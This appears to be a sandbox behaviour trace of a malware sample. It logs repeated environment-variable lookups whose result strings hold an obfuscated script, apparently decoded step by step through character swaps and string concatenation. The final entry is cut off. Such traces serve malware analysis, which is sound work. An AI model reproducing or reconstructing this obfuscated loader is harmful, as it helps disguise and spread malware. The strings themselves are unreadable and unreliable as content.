Environment	Get Environment String	name = `?, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTde37{jUnPjy+@s%zwLhwLTd3pe37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3Qe9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3Qe93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQe37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3Qe97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3Qe9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQe7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQe2+2mQe6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3Qe92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQe7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQe2+2GC7y2+2GC7y6KF3pbfbfk7yuuQe37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQe76xd2+2F3pbf2+2bfk7yuuQe_2+2)[F3pbfbfk7yuuQemQe2+2{F3pbfbfk7yuuQe2+2_:H4axiy+F3pbfbfk7yuuQe7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQeGC7yGC7y'u-3Qe96n37jUn5):jUnbf)-3Qe9X]2+21F3pbfbfk7yuuQeGC7y2+2GC7y'6wL.Y-3Qe96n37.YjUn5))}2+2}[2+2e2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6ee'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQe2+2mQe{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%Ren6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUe/`6KwL,%zwLhPj.Y1.Z.YF3pbf6Re7K3Qe93p8P8 8P:XbGC7y)'7y6TdvwL'enF3pbfPjQewL7yjU6XmuQe6njU'eqF3pbfN7yPjQe8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^\|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%e.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhe37378Pn.Y-8P78P,v%ePjqF3pbfNk7yPjTde,.Y3Qe9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhe3p8P.Y.Y-7yjU6PjmuQe7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXen22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o	1	Fn
Environment	Get Environment String	name = @[~, result_out = s8PGC7y.Y.YsvTd]F3pbf6K'.Y1.Y@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2).Y112s2+263p.YF3p2+2]2+2.YqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8P.Y-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8P.Y967jh`sGC7y8Pm'jU]62+242+2Zn.967[2+2F3pbfbfk7yuuQI37s2+26KF3p].Yjh`sGC7y8P2+2m'2+2jU]64Zn2+2.'u2+2ZGC7ym6k7y11F3p].YqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,.,.Zm6.2+28Ps4ax'Zm.3QI9X2+27',X2+2m,.9 ,.F3pjUn,.2+2.6GC7y4axuQI7ysK_X'2+2k7yn.9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p].Yu`2+2GC7y2+28P{Pjy.Y2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7.YZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wL.Y-3QI96n37.YjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2.2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zn.1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&.Ys8P%.Y.Y6jUI/`6KwL,%zwLhPj.Y1.Z.YF3pbf6RI7K3QI93p8P8 8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11Tdjh.Y8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38P.Y.Y).Y.Y^^^\|GC7yyPj4wLRsh8PZ7ywL3pTd.Y.Y-nXqF3pbfNZqF3pbfN%wL]67yjU6%I.Y.Y-qF3pbfNX3pPj.Y-4ZqF3pbfN.Y%zwLhI37378Pn.Y-8P78P,v%IPjqF3pbfNk7yPjTdI,.Y3QI9`GC7yy7Kjhjh.Y.Y-nPjGC7yy]PjzwLhI3p8P.Y.Y-7yjU6PjmuQI7KqF3pbfN37.Y.Y.Y.Y.Y^^^^^^^&1.Y@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%.Y).Y.Y^&^&.Y.Y,m37'8P7wL.Y.Y.Y,.,.Yo637Z/T.o	1	Fn
Environment	Get Environment String	name = @+*, result_out = s8PGC7ygYgYsvTd]F3pbf6K'gY1gY@sh8PZ7y8P3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+28P4-Pj3QI9h8PZ8P,2+2GC7y2+2[2+27K2+23737-%2+2`k7y8PgY-7Ks2+2s8Pm3QI93p`2+2qF3pbfN6m8PgY967jh`sGC7y8Pm'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7y8P2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfN8PGC7y'a2+28P3QI97yjU62+23pZ8PnGC7y)'2+2Pjk7y8PnR8P6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+28Ps4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+28P{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2h8PZo\F3pX]8P6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wL8P2+2GC7yGC7yyZ78P3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+28Pm'%8P72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wL8PGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'R8Pk7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'R8Pk7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYs8P%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93p8P8 8P:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQI8Ps7yjU6RZGC7yy%11TdjhgY8PqF3pbfN7y8 s3Td]7y)'F3pbf6Td38PgYgY)gYgY^^^\|GC7yyPj4wLRsh8PZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI37378PngY-8P78P,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3p8PgYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@8PqF3pbfN7y8 7yjU6XmsGC7yy8P,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'8P7wLgYgYgY,g,gYo637Z/Tgo	1	Fn
Environment	Get Environment String	name = [{, result_out = seGC7ygYgYsvTd]F3pbf6K'gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem'jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m'2+2jU]64Zn2+2g'u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y'a2+2e3QI97yjU62+23pZenGC7y)'2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax'Zmg3QI9X2+27',X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X'2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 '2+2'H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ''H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s'6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y'u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y'6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em'%e72+2GC7y'wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II'2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ '2+2'2+2jUn2+29 (2+2Pjy)2+2)2)'Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH)'Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y)'7y6TdvwL'InF3pbfPjQIwL7yjU6XmuQI6njU'IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y)'F3pbf6Td3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37'e7wLgYgYgY,g,gYo637Z/Tgo	1	Fn
Environment	Get Environment String	name = {@}, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+2Xb2)gY112s2+263pgYF3p2+2]2+2gYqF3pbfN2+2e4-Pj3QI9heZe,2+2GC7y2+2[2+27K2+23737-%2+2`k7yegY-7Ks2+2sem3QI93p`2+2qF3pbfN6megY967jh`sGC7yem.jU]62+242+2Zng967[2+2F3pbfbfk7yuuQI37s2+26KF3p]gYjh`sGC7ye2+2m.2+2jU]64Zn2+2g.u2+2ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a2+2e3QI97yjU62+23pZenGC7y).2+2Pjk7yenRe6371962+272+2%zwLhGC7yGC7yk7ys8 ,g,gZm6g2+2es4ax.Zmg3QI9X2+27.,X2+2m,g9 ,gF3pjUn,g2+2g6GC7y4axuQI7ysK_X.2+2k7yng9672+2))[2+2F3pbfbfk7yuuQI2+2mQI6KF3p]gYu`2+2GC7y2+2e{PjygY2+24axjUnH [1 .2+2.H)3QI92+2jh2+2heZo\F3pX]e6,%zwLh12+2F3pbf2+2bf2+2k7yuuQI7gYZn1 ..H2+24ax(2+2))\F3pbfbfk7yuuQI2+2GC7y2+2GC7y6KF3pbfbfk7yuuQI37s.6wLe2+2GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd2+2F3pbf2+2bfk7yuuQI_2+2)[F3pbfbfk7yuuQImQI2+2{F3pbfbfk7yuuQI2+2_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh2+23pX2+2X]11F3pbfbf2+2k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]2+21F3pbfbfk7yuuQIGC7y2+2GC7y.6wLgY-3QI96n37gYjUn5))}2+2}[2+2I2+2wLXb12+2{jh`sGC7y2+2em.%e72+2GC7y.wL2+2n,X37Zn2+2g2+2Pjy8 8 7Kjh7yjU6II.2+26wLeGC7yjh2+2GC7y]Zng1F3pbfbf2+2k7yuuQI2+2mQI{ .2+2.2+2jUn2+29 (2+2Pjy)2+2)2).Rek7y3p67yjU6wL1296726xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn22)1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo	1	Fn
Environment	Get Environment String	name = \{, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.a'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4ax.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4axuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4axjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4ax('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4axiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4axH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4axH6xd4ax5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo	1	Fn
Environment	Get Environment String	name = }],$, result_out = seGC7ygYgYsvTd]F3pbf6K.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'63pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfN6megY967jh`sGC7yem.jU]6'+'4'+'Zng967['+'F3pbfbfk7yuuQI37s'+'6KF3p]gYjh`sGC7ye'+'m.'+'jU]64Zn'+'g.u'+'ZGC7ym6k7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjU6'+'3pZenGC7y).'+'Pjk7yenRe637196'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZm6g'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'g6GC7y4WxuQI7ysK_X.'+'k7yng967'+'))['+'F3pbfbfk7yuuQI'+'mQI6KF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]e6,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7y6KF3pbfbfk7yuuQI37s.6wLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI76xd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7Pjy6K1{m6GC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI96n37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.6wLgY-3QI96n37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjU6II.'+'6wLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3p67yjU6wL1'967'6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#H).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]Pjy9iy+{7yjU6%zwLh7K]Pjyiy#+{7yjU6%zwLh7K]PjyjUn bf)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]PjyjUn4WxH).Rek7y3p67yjU6wL11{7yjU6%zwLh7K]PjyjUnjUniy+{7yjU6%zwLh7K]Pjy5H+{7yjU6%zwLh7K]PjyiyjUn)6xd{s%RIn6wLPjy{7yjU6%zwLh7K]Pjy#bf))^&^&gYse%gYgY6jUI/`6KwL,%zwLhPjgY1gZgYF3pbf6RI7K3QI93pe8 e:XbGC7y).7y6TdvwL.InF3pbfPjQIwL7yjU6XmuQI6njU.IqF3pbfN7yPjQIes7yjU6RZGC7yy%11TdjhgYeqF3pbfN7y8 s3Td]7y).F3pbf6Td3egYgY)gYgY^^^\|GC7yyPj4wLRsheZ7ywL3pTdgYgY-nXqF3pbfNZqF3pbfN%wL]67yjU6%IgYgY-qF3pbfNX3pPjgY-4ZqF3pbfNgY%zwLhI3737engY-e7e,v%IPjqF3pbfNk7yPjTdI,gY3QI9`GC7yy7KjhjhgYgY-nPjGC7yy]PjzwLhI3pegYgY-7yjU6PjmuQI7KqF3pbfN37gYgYgYgYgY^^^^^^^&1gY@eqF3pbfN7y8 7yjU6XmsGC7yye,{H6xd4WxH6xd4Wx5Pjy-TdQXIn'')1@Znk7yv%gY)gYgY^&^&gYgY,m37.e7wLgYgYgY,g,gYo637Z/Tgo	1	Fn
Environment	Get Environment String	name = \[, result_out = seGC7ygYgYsvTd]F3pbfaK.gY1gY@sheZ7ye3pTdI37{jUnPjy+@s%zwLhwLTd3pI37{jUn#Pjy+'Xb')gY11's'+'a3pgYF3p'+']'+'gYqF3pbfN'+'e4-Pj3QI9heZe,'+'GC7y'+'['+'7K'+'3737-%'+'`k7yegY-7Ks'+'sem3QI93p`'+'qF3pbfNamegY9a7jh`sGC7yem.jU]a'+'4'+'Zng9a7['+'F3pbfbfk7yuuQI37s'+'aKF3p]gYjh`sGC7ye'+'m.'+'jU]a4Zn'+'g.u'+'ZGC7ymak7y11F3p]gYqF3pbfNeGC7y.W'+'e3QI97yjUa'+'3pZenGC7y).'+'Pjk7yenRea3719a'+'7'+'%zwLhGC7yGC7yk7ys8 ,g,gZmag'+'es4Wx.Zmg3QI9X'+'7.,X'+'m,g9 ,gF3pjUn,g'+'gaGC7y4WxuQI7ysK_X.'+'k7yng9a7'+'))['+'F3pbfbfk7yuuQI'+'mQIaKF3p]gYu`'+'GC7y'+'e{PjygY'+'4WxjUnH [1 .'+'.H)3QI9'+'jh'+'heZo\F3pX]ea,%zwLh1'+'F3pbf'+'bf'+'k7yuuQI7gYZn1 ..H'+'4Wx('+'))\F3pbfbfk7yuuQI'+'GC7y'+'GC7yaKF3pbfbfk7yuuQI37s.awLe'+'GC7yGC7yyZ7e3p1F3pbfbfk7yuuQI7axd'+'F3pbf'+'bfk7yuuQI_'+')[F3pbfbfk7yuuQImQI'+'{F3pbfbfk7yuuQI'+'_:H4Wxiy+F3pbfbfk7yuuQI7PjyaK1{maGC7y%zwLhPjy8 8 zwLh'+'3pX'+'X]11F3pbfbf'+'k7yuuQIGC7yGC7y.u-3QI9an37jUn5):jUnbf)-3QI9X]'+'1F3pbfbfk7yuuQIGC7y'+'GC7y.awLgY-3QI9an37gYjUn5))}'+'}['+'I'+'wLXb1'+'{jh`sGC7y'+'em.%e7'+'GC7y.wL'+'n,X37Zn'+'g'+'Pjy8 8 7Kjh7yjUaII.'+'awLeGC7yjh'+'GC7y]Zng1F3pbfbf'+'k7yuuQI'+'mQI{ .'+'.'+'jUn'+'9 ('+'Pjy)'+')').Rek7y3pa7yjUawL1'9a7'axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#H).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]Pjy9iy+{7yjUa%zwLh7K]Pjyiy#+{7yjUa%zwLh7K]PjyjUn bf)axd{s%RInawLPjy{7yjUa%zwLh7K]PjyjUn4WxH).Rek7y3pa7yjUawL11{7yjUa%zwLh7K]PjyjUnjUniy+{7yjUa%zwLh7K]Pjy5H+{7yjUa%zwLh7K]PjyiyjUn)axd{s%RInawLPjy{7yjUa%zwLh7K]Pjy#bf))^&^&gYse%gYgYajUI/`aKwL,%zwLhPjgY1gZgYF3pbfaRI7K3QI93pe8 